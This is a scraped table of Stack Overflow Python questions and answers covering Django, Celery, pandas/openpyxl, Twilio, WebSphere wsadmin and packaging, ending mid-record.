title
stringlengths
10
172
question_id
int64
469
40.1M
question_body
stringlengths
22
48.2k
question_score
int64
-44
5.52k
question_date
stringlengths
20
20
answer_id
int64
497
40.1M
answer_body
stringlengths
18
33.9k
answer_score
int64
-38
8.38k
answer_date
stringlengths
20
20
tags
listlengths
1
5
iterating a single item list faster than iterating a long string? #Python #Cherrypy
38,708,672
<p>When using Cherrypy, I ran into this comment line. "strings get wrapped in a list because iterating over a single item list is much faster than iterating over every character in a long string." This is located at <a href="https://github.com/cherrypy/cherrypy/blob/master/cherrypy/lib/encoding.py#L223" rel="nofollow">https://github.com/cherrypy/cherrypy/blob/master/cherrypy/lib/encoding.py#L223</a> I have done some researches online but I still don't fully understand the reason to wrap the response.body as [response.body]. ? Can anyone show me the details behind this design? </p>
-1
2016-08-01T21:48:40Z
38,708,904
<p>I think that code only makes sense if you recognize that prior to the code with that comment, <code>self.body</code> could be either a single string, or an iterable sequence that contains many strings. Other code will use it as the latter (iterating on it and doing string stuff with the items).</p> <p>While would technically work to let that later code loop over the characters of the single string, processing the data character by character is likely inefficient. So the code below the comment wraps a list around the single string, letting it get processed all at once.</p>
2
2016-08-01T22:11:10Z
[ "python", "cherrypy" ]
TemplateDoesNotExist at / base/index.html when deploying to heroku
38,708,729
<p>I've been working on this issue for days and I would really love some real help here! :)</p> <p>I'm brand new to Python, Django, and stackoverflow, so please let me know if more information or a different format would be helpful. </p> <p>I'm trying to deploy my app on Heroku. It runs locally, but when I try to </p> <blockquote> <p>heroku open</p> </blockquote> <p>I get the following error: </p> <blockquote> <p>TemplateDoesNotExist at / base/index.html</p> </blockquote> <p>I've seen this happen to others, and I've tried the following fixes which haven't worked:</p> <ul> <li>Changing the folder structure by putting index.html directly into templates instead of templates>base>index.html (<a href="http://stackoverflow.com/questions/30415562/templatedoesnotexist-when-base-template-is-in-root-folder?rq=1">TemplateDoesNotExist when base template is in root folder</a>) - This causes the app to stop running locally <ul> <li>Adding templates as an installed app (like I did for core) by adding </li> </ul></li> </ul> <blockquote> <p>(r'', include('templates.urls')),</p> </blockquote> <p>to my urls.py</p> <p>and added </p> <blockquote> <p>'templates'</p> </blockquote> <p>to my settings.py. This caused the app to stop running locally, so I changed it back. </p> <ul> <li>changed my views.py from:</li> </ul> <blockquote> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = "base/index.html" </code></pre> </blockquote> <p>to</p> <blockquote> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = [os.path.join(MAIN_DIR, 'coffeedapp2/templates')], </code></pre> </blockquote> <ul> <li>checked to make sure I have standard Django 1.8x template settings (<a href="http://stackoverflow.com/questions/30018847/templatedoesnotexist-at-base-index-html">TemplateDoesNotExist at / base/index.html</a>) <ul> <li>tried changing my views.py from:</li> </ul></li> </ul> <blockquote> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = "base/index.html" </code></pre> </blockquote> <p>to</p> <blockquote> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = "base/index.html" </code></pre> </blockquote> <p>(<a href="http://stackoverflow.com/questions/36981074/templatedoesnotexist-at-at-templates-index-html">TemplateDoesNotExist at / at templates/index.html</a>)</p> <p>I'm thinking that I may need to define a SITE_ROOT or something but whenever I try to do that it stops running locally. </p> <p><strong>ERROR:</strong></p> <blockquote> <p>TemplateDoesNotExist at / base/index.html Request Method: GET Request URL: <a href="https://salty-journey-18003.herokuapp.com/" rel="nofollow">https://salty-journey-18003.herokuapp.com/</a> Django Version: 1.9.7 Exception Type: TemplateDoesNotExist Exception Value: base/index.html Exception Location: /app/.heroku/python/lib/python2.7/site-packages/django/template/loader.py in select_template, line 74 Python Executable: /app/.heroku/python/bin/python Python Version: 2.7.12 Python Path: ['/app', '/app/.heroku/python/bin', '/app/.heroku/python/lib/python2.7/site-packages/setuptools-23.1.0-py2.7.egg', '/app/.heroku/python/lib/python2.7/site-packages/pip-8.1.2-py2.7.egg', '/app', '/app/.heroku/python/lib/python27.zip', '/app/.heroku/python/lib/python2.7', '/app/.heroku/python/lib/python2.7/plat-linux2', '/app/.heroku/python/lib/python2.7/lib-tk', '/app/.heroku/python/lib/python2.7/lib-old', '/app/.heroku/python/lib/python2.7/lib-dynload', '/app/.heroku/python/lib/python2.7/site-packages'] Server time: Mon, 1 Aug 2016 20:50:53 +0000 Template-loader postmortem</p> <p>Django tried loading these templates, in this order:</p> <p>Using engine django: django.template.loaders.filesystem.Loader: /coffeedapp2/templates/base/index.html (Source does not exist) django.template.loaders.app_directories.Loader: /app/.heroku/python/lib/python2.7/site-packages/django/contrib/admin/templates/base/index.html (Source does not exist) django.template.loaders.app_directories.Loader: /app/.heroku/python/lib/python2.7/site-packages/django/contrib/auth/templates/base/index.html (Source does not exist)</p> </blockquote> <p>settings.py</p> <p>"""</p> <pre><code>Django settings for coffeedapp2 project. Generated by 'django-admin startproject' using Django 1.9.7. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) MAIN_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '^h)ohz4qbhu&amp;5po084_ob8qy+1c*h^tb#jtab!p965^8@&amp;64q!' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'core', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'coffeedapp2.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(MAIN_DIR, 'coffeedapp2/templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.contrib.auth.context_processors.auth', 'django.template.context_processors.debug', 'django.template.context_processors.i18n', 'django.template.context_processors.media', 'django.template.context_processors.static', 'django.template.context_processors.tz', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'coffeedapp2.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Update database configuration with $DATABASE_URL. import dj_database_url db_from_env = dj_database_url.config() DATABASES['default'] = dj_database_url.config() # Honor the 'X-Forwarded-Proto' header for request.is_secure() SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') # Allow all host headers ALLOWED_HOSTS = ['*'] # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/' STATICFILES_DIRS = ( os.path.join(MAIN_DIR, 'coffeedapp2', 'static'), ) </code></pre> <p>coffeedapp>urls.py</p> <pre><code>from django.conf.urls import url from django.contrib import admin from django.conf.urls import include from django.conf.urls import patterns urlpatterns = patterns('', url(r'^admin/', include(admin.site.urls)), (r'', include('core.urls')), ) </code></pre> <p>core>urls.py</p> <pre><code>from django.conf.urls import patterns, include, url import core.views as coreviews from django.conf.urls import include urlpatterns = patterns('', url(r'^$', coreviews.LandingView.as_view()), ) </code></pre> <p>core>views.py</p> <pre><code>from django.shortcuts import render from django.views.generic.base import TemplateView # Create your views here. class LandingView(TemplateView): template_name = "base/index.html" </code></pre> <p><a href="http://i.stack.imgur.com/45NUY.png" rel="nofollow">See image of file structure</a></p> <pre><code>Relevant file structure: coffeedapp2 coffeedapp2 _init_.py settings.py settings.py urls.py wsgi.py core migrations _init_.py admin.py apps.py models.py tests.py urls.py views.py static templates base index.html </code></pre>
0
2016-08-01T21:53:02Z
38,709,559
<p>In your <code>TEMPLATES</code> setting, try changing your <code>DIRS</code> setting to:</p> <pre><code>'DIRS': [os.path.join(BASE_DIR, 'templates')], </code></pre> <p>This is the usual approach, I cannot see any reason to use <code>MAIN_DIR</code> as you currently do.</p> <p>Keep the template as</p> <pre><code>template_name = "base/index.html" </code></pre>
0
2016-08-01T23:25:05Z
[ "python", "django", "heroku" ]
Django / mySQL - AttributeError: 'ForeignKey' object has no attribute 'IntegerField'
38,708,748
<p>I have a django project which works fine on windows. and I am trying to move it to a ubuntu. There are some problem exist when I run <code>python manage.py runserver 8000</code></p> <blockquote> <p>File "/home/zhaojf1/Web-Interaction-APP/fileUpload_app/models.py", line 151, in Machine number_pins = models.IntegerField(blank=True, null=True)</p> <p>AttributeError: 'ForeignKey' object has no attribute 'IntegerField'</p> </blockquote> <p>Also this column in the Machine table is not a foreign key item.</p> <p>Code in views.py:</p> <pre><code>140 class Machine(models.Model): 141 model = models.ForeignKey('Model', db_column='model', blank=True, null=True) 142 sn = models.CharField(max_length=50, blank=True) 143 mine_lon = models.CharField(max_length=50, blank=True) 144 mine_lat = models.CharField(max_length=50, blank=True) 145 location = models.CharField(max_length=50, blank=True) 146 total_hours = models.IntegerField(blank=True, null=True) 147 travel_hours = models.IntegerField(blank=True, null=True) 148 machine_id = models.IntegerField(primary_key=True) 149 models = models.ForeignKey('Model', db_column='models', blank=True, null=True) 150 # photo_set_num = models.IntegerField(blank=True, null=True) 151 number_pins = models.IntegerField(blank=True, null=True) 152 class Meta: 153 managed = False 154 db_table = 'machine' </code></pre> <p>I have a mysql database and I generate the models.py directly from mysql using </p> <p><code>$ python manage.py inspectdb &gt; models.py</code></p>
1
2016-08-01T21:54:20Z
38,708,803
<p>Your field named <code>models</code> shadows the <code>models</code> imported from Django. You can either rename the field:</p> <pre><code>other_name_for_models = models.ForeignKey('Model', db_column='models', blank=True, null=True) </code></pre> <p>or import the module with a different name</p> <pre><code>from django.db import models as django_models class Machine(django_models.Model): models = django_models.ForeignKey('Model', db_column='model', blank=True, null=True) </code></pre>
3
2016-08-01T22:00:10Z
[ "python", "mysql", "django" ]
openoffice calc - newline causes duplicate value in cells (pandas/openpyxl)
38,708,775
<p>Does anyone know how to workaround a problem of OpenOffice Calc not handling new lines in cells correct?</p> <p>I have a python script that is dynamically generating an excel workbook using openpyxl via pandas.</p> <p>The script works fine but when I view cells in OpenOffice that contain newlines all the values are duplicated multiple times. If I open the same file using the Microsoft Excel Viewer everything is displayed correctly and if I use a character other than a new line (e.g. comma, #, etc) it displays fine in both also. </p> <p>I have a workaround to go into the excel and replace the random character using a macro but would like to avoid that if possible as the process really needs to be completely automated. also because the file will be processed by an another internal tool, I do need these cells to be processed with a new line and I can't change the character.</p> <p>I have also tried using chr(10) and/or chr(13) but in the former case it just get's replaced in the output by '\n' anyway as expected.</p> <p>The code I'm currently using is similar to:</p> <pre><code>test_list = [] for x in range(1,18): test_list.append([ "value1", "\n".join(['element1', 'element2', 'element3']), "value3" ]) data_df = pd.DataFrame(test_list) fn = r'/path/to/excel/file.xlsx' writer = pd.ExcelWriter(fn, engine='xlsxwriter') data_df.to_excel(writer, sheet_name='Data', index=False, header=0) workbook = writer.book worksheet = writer.sheets['Data'] worksheet.set_column('A:ZZ',50, workbook.add_format({'text_wrap': True})) writer.save() </code></pre> <p>What happens with the Element data is that it shows in the OpenOffice Calc cell as something like:</p> <p><a href="http://i.stack.imgur.com/OHys3.png" rel="nofollow"><img src="http://i.stack.imgur.com/OHys3.png" alt="Openoffice Cells"></a></p> <p>Oddly the last item appears to be correct</p> <p>The same data viewed as a list or via DataFrame.head() appears fine: </p> <pre><code>pprint(test_list) [['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ... ['value1', 'element1\nelement2\nelement3', 'value3']] data_df.head(18): 0 1 2 0 value1 element1\nelement2\nelement3 value3 1 value1 element1\nelement2\nelement3 value3 2 value1 element1\nelement2\nelement3 value3 ... 15 value1 element1\nelement2\nelement3 value3 16 value1 element1\nelement2\nelement3 value3 </code></pre> <p>It's just when it get passed to the openpyxl library and viewed in OpenOffice.</p> <p>Thanks</p>
4
2016-08-01T21:57:08Z
38,725,267
<p>When I run your example with a recent Pandas and XlsxWriter I get the expected output in Excel:</p> <p><a href="http://i.stack.imgur.com/lMxNe.png" rel="nofollow"><img src="http://i.stack.imgur.com/lMxNe.png" alt="enter image description here"></a></p> <p>However, in this case Excel is automatically adjusting the height of row 2 to compensate. That may not be happening in OpenOffice. </p> <p>In which case you can set it explicitly like this:</p> <pre><code>worksheet.set_row(1, 45) </code></pre>
0
2016-08-02T15:55:27Z
[ "python", "openoffice-calc", "xlsxwriter" ]
openoffice calc - newline causes duplicate value in cells (pandas/openpyxl)
38,708,775
<p>Does anyone know how to workaround a problem of OpenOffice Calc not handling new lines in cells correct?</p> <p>I have a python script that is dynamically generating an excel workbook using openpyxl via pandas.</p> <p>The script works fine but when I view cells in OpenOffice that contain newlines all the values are duplicated multiple times. If I open the same file using the Microsoft Excel Viewer everything is displayed correctly and if I use a character other than a new line (e.g. comma, #, etc) it displays fine in both also. </p> <p>I have a workaround to go into the excel and replace the random character using a macro but would like to avoid that if possible as the process really needs to be completely automated. also because the file will be processed by an another internal tool, I do need these cells to be processed with a new line and I can't change the character.</p> <p>I have also tried using chr(10) and/or chr(13) but in the former case it just get's replaced in the output by '\n' anyway as expected.</p> <p>The code I'm currently using is similar to:</p> <pre><code>test_list = [] for x in range(1,18): test_list.append([ "value1", "\n".join(['element1', 'element2', 'element3']), "value3" ]) data_df = pd.DataFrame(test_list) fn = r'/path/to/excel/file.xlsx' writer = pd.ExcelWriter(fn, engine='xlsxwriter') data_df.to_excel(writer, sheet_name='Data', index=False, header=0) workbook = writer.book worksheet = writer.sheets['Data'] worksheet.set_column('A:ZZ',50, workbook.add_format({'text_wrap': True})) writer.save() </code></pre> <p>What happens with the Element data is that it shows in the OpenOffice Calc cell as something like:</p> <p><a href="http://i.stack.imgur.com/OHys3.png" rel="nofollow"><img src="http://i.stack.imgur.com/OHys3.png" alt="Openoffice Cells"></a></p> <p>Oddly the last item appears to be correct</p> <p>The same data viewed as a list or via DataFrame.head() appears fine: </p> <pre><code>pprint(test_list) [['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ['value1', 'element1\nelement2\nelement3', 'value3'], ... ['value1', 'element1\nelement2\nelement3', 'value3']] data_df.head(18): 0 1 2 0 value1 element1\nelement2\nelement3 value3 1 value1 element1\nelement2\nelement3 value3 2 value1 element1\nelement2\nelement3 value3 ... 15 value1 element1\nelement2\nelement3 value3 16 value1 element1\nelement2\nelement3 value3 </code></pre> <p>It's just when it get passed to the openpyxl library and viewed in OpenOffice.</p> <p>Thanks</p>
4
2016-08-01T21:57:08Z
38,727,080
<p>The code worked fine for me using OpenOffice 4.1.2 on Windows:</p> <p><a href="http://i.stack.imgur.com/BnVEj.png" rel="nofollow"><img src="http://i.stack.imgur.com/BnVEj.png" alt="enter image description here"></a></p> <p>For this screenshot, I double-clicked on the bottom of the second row to expand it. Before that, it just showed <code>element3</code> with a red triangle. But that seems different from the behavior you described.</p> <p><strong>EDIT</strong>:</p> <p>Ok, I can now confirm the problem. As you said, it occurs with the mysterious number of 18 items. It looks like a bug in OpenOffice, because there is not much difference in the XML files viewed by unzipping <code>file.xlsx</code>.</p> <p>I also tried adding CR and LF directly to the XML files, but this just resulted in:</p> <p><a href="http://i.stack.imgur.com/596Hc.png" rel="nofollow"><img src="http://i.stack.imgur.com/596Hc.png" alt="enter image description here"></a></p> <p>That leaves us with three solutions:</p> <ol> <li>Use LibreOffice instead, which does not have this problem (tested LO 5.1.0.3).</li> <li><a href="https://www.openoffice.org/qa/ooQAReloaded/ooQA-ReportBugs.html" rel="nofollow">Report the bug</a> and wait for a new version.</li> <li>Use OpenOffice's preferred <code>.ods</code> format instead of MS Office's preferred format.</li> </ol>
2
2016-08-02T17:38:17Z
[ "python", "openoffice-calc", "xlsxwriter" ]
Why is there an underscore following the "from" in the Twilio Rest API?
38,708,834
<p>In the <a href="https://www.twilio.com/docs/libraries/python#testing-your-installation" rel="nofollow">twilio python library</a>, we have this feature to create messages:</p> <p><code>from twilio.rest import TwilioRestClient </code></p> <p>and we can write:</p> <p><code>msg = TwilioRestClient.messages.create(body=myMsgString, from_=myNumber, to=yourNumber)</code></p> <p>My question is simple: why does an underscore follow the <code>from</code> parameter? Or why is that the parameter name? Is it because <code>from</code> is otherwise a keyword in Python and we differentiate variables from keywords with an underscore suffix? Is that actually necessary in this case?</p>
5
2016-08-01T22:02:56Z
38,708,867
<p>This is because <code>from</code> would be an invalid argument name, resulting in a <code>SyntaxError</code> - it's a python keyword.</p> <p>Appending a trailing underscore is the recommended way to avoid such conflicts mentioned in the <a href="https://www.python.org/dev/peps/pep-0008/#function-and-method-arguments">PEP8 style guide</a>:</p> <blockquote> <p>If a function argument's name clashes with a reserved keyword, it is generally better to append a single trailing underscore rather than use an abbreviation or spelling corruption. </p> </blockquote>
11
2016-08-01T22:07:15Z
[ "python", "twilio", "twilio-api" ]
Run Celery task for each row returned from MySQL query?
38,708,893
<p>I've used Python before but only for Flask applications, but I've never used Celery before. After reading the docs and setting everything up (and it works as I've tested it with multiple workers) I'm trying to run an SQL query and for each row that gets returned from the query send it off to be processed by a Celery worker.</p> <p>Below is a sample of the very basic code.</p> <pre><code>from celery import Celery import MySQLdb app = Celery('tasks', broker='redis://localhost:6379/0') @app.task def print_domain(): db = MySQLdb.connect(host="localhost", user="DB_USER", passwd="DB_PASS", db="DB_NAME") cur = db.cursor() cur.execute("SELECT * FROM myTable") for row in cur.fetchall(): print_query_result(row[0]) db.close() def print_query_result(result): print result </code></pre> <p>Basically it selects everything in the 'myTable' table and for each row returned it prints it out. If I call the code using just Python it works fine and prints all the data from the MySQL table. When I call it using the .delay() function to send it off to a worker to process it only sends it to the one worker and only outputs the top row in the database.</p> <p>I've been trying to read up on subtasks but I'm not sure if I'm going in the right direction with that.</p> <p>In short, I'm wanting this to happen, but I've no where to start with it. Has anyone got any ideas?</p> <ul> <li>SQL query to select all rows in table</li> <li>Send each row/result to a worker to process some code</li> <li>Return code result back into a database</li> <li>Pick up next item in queue (if any)</li> </ul> <p>Thanks in advance. </p> <p>EDIT 1:</p> <p>I've updated my code to use SQLAlchemy instead, but the results are still returning like my old query which is fine.</p> <pre><code>from celery import Celery from models import DBDomains app = Celery('tasks', broker='redis://localhost:6379/0') @app.task def print_domain(): query = DBDomains.query.all() for i in query: print i.domain print_query_result.s() @app.task def print_query_result(): print "Received job" print_domain.delay() </code></pre> <p>The worker when running the .py file returns:</p> <pre><code>[2016-08-02 02:08:40,881: INFO/MainProcess] Received task: tasks.print_domain[65d7667a-fc70-41f7-8caa-b991f360a9de] [2016-08-02 02:08:41,036: WARNING/Worker-3] result1 [2016-08-02 02:08:41,037: WARNING/Worker-3] result2 [2016-08-02 02:08:41,039: INFO/MainProcess] Task tasks.print_domain[65d7667a-fc70-41f7-8caa-b991f360a9de] succeeded in 0.154022816569s: None </code></pre> <p>As you can see, the worker gets 'result1' and 'result2' from the table I'm querying but then it doesn't seem to execute the command in the subtask which is just to print "Job received".</p> <p>UPDATE: It looks like the subtask had to have a .delay() on the end of it as per the Celery docs so my code looks like this and successfully distributes the jobs across the workers now.</p> <pre><code>from celery import Celery from models import DBDomains app = Celery('tasks', broker='redis://localhost:6379/0') @app.task def print_domain(): query = DBDomains.query.all() for i in query: subtask = print_query_result.s(i.domain) subtask.delay() @app.task def print_query_result(domain): print domain print_domain.delay() </code></pre>
0
2016-08-01T22:10:03Z
38,710,226
<p>Whenever you call a task from within a task, you have to use <a href="http://docs.celeryproject.org/en/latest/getting-started/next-steps.html#canvas-designing-workflows" rel="nofollow">subtasks</a>. Fortunately the syntax is easy.</p> <pre><code>from celery import Celery app = Celery('tasks', broker='redis://127.0.0.1:6379/0') @app.task def print_domain(): for x in range(20): print_query_result.s(x) @app.task def print_query_result(result): print(result) </code></pre> <p>(Substitute for x in range(20) with your query results.) And if you're watching the celery output, you'll see the tasks created and distributed across the workers.</p>
1
2016-08-02T00:54:50Z
[ "python", "mysql", "celery" ]
EVault backup status outdated
38,708,939
<p>I am getting the latest backup job status of the EVault agents from the API but for one job the status is outdated since the jobs are running successfully daily as has been informed by the EVault notification.</p> <h1>EVault notification</h1> <pre><code>Agent: Number 3 Job: BACKUP Daily Retention: DAILY Job start time: 31-Jul-2016 21:00:05 -0500 Job end time: 31-Jul-2016 21:00:30 -0500 Elapsed Time: 00:00:25 SafeSet: 00000252 </code></pre> <h1>API call</h1> <pre><code>SoftLayer_API['Account'].getEvaultNetworkStorage(mask='mask(SoftLayer_Network_Storage_Backup_Evault_Version6)[virtualGuest,hardware,backupJobDetails]')] </code></pre> <h1>Getting from the API (take a look on lastRunDate):</h1> <pre><code>{ 'username':'IBME657XXX-3', 'serviceResourceName':'ev-vaultdalxxxx.service.softlayer.com', 'id':728XXXX, 'backupJobDetails':[ { 'description':'Daily backups', 'lastRunDate':'2016-07-19T21:01:07-05:00', ... } ], ... } </code></pre> <h1>Expect to get from the API:</h1> <pre><code>{ 'username':'IBME657XXX-3', 'serviceResourceName':'ev-vaultdalXXXX.service.softlayer.com', 'id':728XXXX, 'backupJobDetails':[ { 'description':'Daily backups', 'lastRunDate':'2016-07-31T21:00:30-05:00', ... } ], ... } </code></pre> <p>Any idea what is wrong?</p>
0
2016-08-01T22:15:07Z
38,719,416
<p>Are you sure that is the last time that the job ran? The content of the "backupJobDetails" property is ordered ASC, so the last time of the job ran is the last value into the "backupJobDetails" property.</p> <p>Also review if you see the same wrong value in the control portal at <a href="https://control.softlayer.com/storage/evault" rel="nofollow">https://control.softlayer.com/storage/evault</a></p> <p>You only might see a little diference in the time, but that is likely due to your Evault device and your Softlayer Account have a different timezone configuration.</p> <p>If you are still seeing a big diference between the time displayed in your Device and the time displayed in the Control Portal, it may be an issue and I recommend you to open a Ticket in softlayer in order they can look into that.</p> <p>Regards</p>
0
2016-08-02T11:38:52Z
[ "python", "softlayer" ]
IBM WebSphere Application Server wsadmin returning only first result out of 6 in script
38,709,006
<p>When attempting to get the status of applicaitons in WebSphere Application Server, I expect there to be multiple returned mbeans. However, WAS is only returning the first result and discarding the rest of them it seems.</p> <pre><code>[wasadmin@servername01 ~]$ Run_wsadmin.sh -f wsadmin_Check_App_Status.py WASX7209I: Connected to process "dmgr" on node PRDDMGR using SOAP connector; The type of process is: DeploymentManager WASX7026W: String "type=Application,name=AMTApp,*" corresponds to 6 different MBeans; returning first one. </code></pre> <p>The script I'm running looks like this: </p> <pre><code>app_name = AppName app_status = AdminControl.completeObjectName('type=Application,name=' + app_name + ',*').split('\n') for status in app_status : print( status ) # end of For status in app_status </code></pre> <p>Is there some setting in WebSphere, or do I need to import some special library into my script? </p>
1
2016-08-01T22:22:30Z
38,709,310
<p>According to the doc of <code>AdminControl.completeObjectName()</code></p> <blockquote> <p>Use the completeObjectName command to create a string representation of a complete ObjectName value that is based on a fragment. This command does not communicate with the server to find a matching ObjectName value. <strong>If the system finds several MBeans that match the fragment, the command returns the first one.</strong></p> </blockquote> <p>So that function is behaving as expected.</p> <p><strong>Instead</strong>:<br> In this situation, it sounds like you want to use <code>AdminControl.queryNames()</code>, which is built for returning a list of results that match your query. </p> <p>For example:</p> <pre><code>app_name = AppName app_status = AdminControl.queryNames('type=Application,name=' + app_name + ',*').split('\n') for status in app_status : print( status ) </code></pre> <p>Source: <a href="https://www.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rxml_admincontrol.html" rel="nofollow">Commands for the AdminControl object using wsadmin scripting</a></p>
3
2016-08-01T22:55:18Z
[ "python", "websphere", "ibm", "jython" ]
How to reformat dataframe, suppress exponential
38,709,017
<p>How to reformat a pandas dataframe such that there are no scientific notation such as exponential signs? And also, <code>serial_num</code> should be integer.</p> <p>I tried <code>df = pd.read_csv(StringIO('data.csv'))</code> but it didnt work.</p> <pre><code>df = pd.read_csv('data.csv') print df id serial_num membershipid date 0 1 ["374740"] 8.6948585e+7 2016-05-06 1 2 ["277474"] 5.2444556e+7 2016-05-06 2 3 ["394005"] 8.5948585e+7 2016-05-06 #Output should be this instead; id serial_num membershipid date 0 1 374740 86948585 2016-05-06 1 2 277474 52444556 2016-05-06 2 3 394005 85948585 2016-05-06 </code></pre>
2
2016-08-01T22:23:49Z
38,709,144
<p>Try:</p> <pre><code>df.membershipid = df.membershipid.astype(int) df.serial_num = df.serial_num.str.extract(r'"(.*)"', expand=False).astype(int) </code></pre> <p><a href="http://i.stack.imgur.com/pk5ez.png" rel="nofollow"><img src="http://i.stack.imgur.com/pk5ez.png" alt="enter image description here"></a></p>
2
2016-08-01T22:36:55Z
[ "python", "pandas" ]
What is the difference between float(44*2.2) and (float)(44*2.2) in PYTHON 3?
38,709,029
<p>If you just type <code>float(44*2.2)</code> on the interpreter and <code>(float)(44*2.2)</code> they return the same result. Is one explicitly casting the result, and one using it as a function? And what is the use of each case and any pro's/con's for each case? This is Python 3, I'm sure it'll work with Python 2 as well.</p>
0
2016-08-01T22:24:38Z
38,709,062
<p>Both usages invoke the built-in function <code>float</code>. In python, functions are just values, so <code>(float)</code> is the same function reference as <code>float</code>.</p> <p>There is no casting involved. I would prefer the first usage, because it's more clear.</p>
4
2016-08-01T22:27:40Z
[ "python" ]
What's the preferred python distribution if I want to package my env and code into one bundle
38,709,071
<p>I have a python env and code that runs on that env. I have code to setup this env using wget and such, but that's not OS independent really.</p> <p>I wish to bundle this env and code into one (bundle?) and distribute, so the user doesn't has to set up the env before running the code.</p> <p>Basically give the end user something (executable, tar, zip, .py), and after running/extracting that user should be able to run my main python script.</p> <p>I looked into wheels, but I'm not sure if that solves the purpose.</p>
0
2016-08-01T22:28:22Z
38,709,130
<p>If the code is run on a server you should consider using <a href="https://www.docker.com" rel="nofollow">docker</a> and <a href="https://docs.docker.com/compose/overview/" rel="nofollow">docker-compose</a>.</p> <p>This technology allows you to define the entire setup in config-files, and the only thing you need to do when you deploy your code on a new server is to run a single command (<code>docker-compose up</code>)</p>
1
2016-08-01T22:35:28Z
[ "python", "python-packaging" ]
What's the preferred python distribution if I want to package my env and code into one bundle
38,709,071
<p>I have a python env and code that runs on that env. I have code to setup this env using wget and such, but that's not OS independent really.</p> <p>I wish to bundle this env and code into one (bundle?) and distribute, so the user doesn't has to set up the env before running the code.</p> <p>Basically give the end user something (executable, tar, zip, .py), and after running/extracting that user should be able to run my main python script.</p> <p>I looked into wheels, but I'm not sure if that solves the purpose.</p>
0
2016-08-01T22:28:22Z
38,754,968
<p>Decided to use <a href="http://www.pyinstaller.org/" rel="nofollow">Pyinstaller</a>. Seems straightforward and under active development.</p>
0
2016-08-03T22:58:49Z
[ "python", "python-packaging" ]
Duck typing and foreign objects
38,709,075
<p>I'm currently replicating something similar to this question: <a href="http://stackoverflow.com/questions/2351525/python-switch-by-class-name">python switch by class name?</a></p> <p>I have a for loop that iterates over a set of objects and sorts them, by their type, into one of several lists.</p> <pre><code>for obj in list_of_things: if isinstance(obj, Class1): class1list.append(obj) if isinstance(obj, Class2): class2list.append(obj) </code></pre> <p>etc. for several other classes. The application is something like an ORM - data from each class will be extracted and written to a database, and each class has different data to extract. Additionally, it is necessary that all instances of Class1 be processed by the ORM before any instances of Class2.</p> <p>Lastly, Class1 and Class2 are not mine - they're the output of an API that I'm using, so I have no ability to change them as is suggested in the previous question (like, writing a serialize() method that dumps the data I need in each class). I make a request to the API for some objects, and it floods me with objects of various types, from each of which I need to extract different data.</p> <p>Is there a more pythonic way of doing this? This approach meets the need, but it hurts my eyes and I'd like to learn a better way. I'm pretty new to Python still.</p>
1
2016-08-01T22:28:53Z
38,709,360
